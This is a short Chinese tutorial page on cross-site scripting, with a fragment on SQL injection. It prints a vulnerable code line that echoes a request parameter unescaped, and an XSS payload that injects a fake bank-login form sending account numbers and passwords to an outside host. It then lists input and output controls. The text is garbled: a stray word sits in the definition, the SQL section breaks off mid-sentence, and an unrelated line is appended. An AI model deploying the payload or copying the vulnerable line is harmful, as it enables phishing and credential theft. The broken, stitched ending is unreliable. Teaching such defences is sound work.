xss漏洞攻击与防止办法
xss又叫css教程 (cross site script) ,跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
源页面放一个标签,在后台page_load里面写this.textlabel.text = request["msg"];
构建攻击,让攻击后把数据传递到目标页
构建代码如下:
msg=<form action='http://www.xmwzidc.com' method='get'>银行账号:<input type='text' name='id'/>密码:<input type='text' name='pwd'/><input type='submit' value='login'/></form>
、解决办法
最重要的一点,就是提高意识严格控制输入和输出。具体执行的方式有以下几点:
第一、在输入方面对所有用户提交内容进行可靠的输入验证,提交内容包括url、查询关键字、http头、post数据等
第二、在输出方面,在用户输内容中使用<xmp>标签。标签内的内容不会解释,直接显示。
第三、严格执行字符输入字数控制。
第四、在脚本执行区中,应绝无用户输入。
=====================================================
sql注入
加入用户提交的 内容里面 含有 ; 号,那么sql语句会被截断....然后,后果就
页面加载完毕后,执行login